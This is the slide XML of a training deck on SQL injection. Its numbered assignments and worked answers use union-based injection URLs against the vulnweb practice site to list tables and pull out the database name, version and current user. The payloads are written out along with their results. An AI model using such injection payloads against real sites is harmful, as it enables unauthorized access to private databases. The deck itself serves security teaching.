        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{56107FF3-6211-4FEA-9B86-4C6F8A053EF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="182880" y="5391848"/>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31740" rIns="0" bIns="82524"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Muli"/>
              </a:rPr>
              <a:t>Let’s penetrate more inside using union base injection to select statement from a different table.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="4C4F53"/>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4C4F53"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://testphp.vulnweb.com/artists.php?artist=1 union select 1,2,3</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US"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a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Muli"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Muli"/>
              </a:rPr>
              <a:t>From the screenshot, you can see it is show result for only one table not for others.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49731784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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignment#11</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="3892168"/>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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://testphp.vulnweb.com/artists.php?artist=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can you find out other 3 tables by using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>union+select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> statement and trying with invalid artist id</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[hint: try union statement &amp; select statement]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{CCE18C87-9933-41A5-9E86-57671886B370}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="371475" y="5391848"/>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31740" rIns="0" bIns="82524"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Muli"/>
              </a:rPr>
              <a:t>Now try to pass wrong input into the database through URL by replacing </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Muli"/>
              </a:rPr>
              <a:t>artist=1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Muli"/>
              </a:rPr>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Muli"/>
              </a:rPr>
              <a:t>artist=-1 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Muli"/>
              </a:rPr>
              <a:t>as given below:</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="4C4F53"/>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4C4F53"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,3</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US"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a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Muli"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Muli"/>
              </a:rPr>
              <a:t>Hence you can see now it is showing the result for the remaining two tables also.</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76133573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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignment#12</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://testphp.vulnweb.com/artists.php?artist=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can you find out the database name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[hint: try union statement &amp; select statement]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{50DADFB6-C8C4-49CD-8632-10CF5B0F837C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="95250" y="5391848"/>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31740" rIns="0" bIns="82524"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4C4F53"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,database(),3</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US"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Muli"/>
              </a:rPr>
              <a:t>From the screenshot, you can read the database name </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Muli"/>
              </a:rPr>
              <a:t>acuart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7815573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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignment#13</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://testphp.vulnweb.com/artists.php?artist=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can you find out the database version &amp; username</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[hint: try union statement &amp; select statement]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{5D79B4CA-85C7-4B60-84C0-AF66A2DCFDD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="182880" y="5391848"/>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31740" rIns="0" bIns="82524"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4C4F53"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,version(),</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="4C4F53"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>current_user</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="4C4F53"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</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Muli"/>
              </a:rPr>
              <a:t>Here we have retrieve </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Muli"/>
              </a:rPr>
              <a:t>5.1.73 0ubuntu0 10.04.1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Muli"/>
              </a:rPr>
              <a:t> as version and </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Muli"/>
              </a:rPr>
              <a:t>acuart@localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Muli"/>
              </a:rPr>
              <a:t> as the current user</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53062939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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
